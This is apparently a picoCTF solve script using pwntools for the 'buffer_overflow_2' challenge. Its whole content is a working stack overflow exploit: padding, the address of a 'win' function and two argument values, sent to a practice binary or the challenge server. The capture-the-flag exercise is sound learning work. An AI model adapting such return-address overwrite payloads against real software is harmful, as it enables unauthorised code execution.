picoctf/pwn/buffer_overflow_2/solve.py

31 lines
615 B
Python
Raw Normal View History

2024-09-03 19:46:13 +02:00
#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
print(r.recvuntil(b"Please enter your string:"))
offset = 112 # found with pwndbg
payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
r.sendline(payload)
print(r.recvall())
r.close()
if __name__ == "__main__":
main()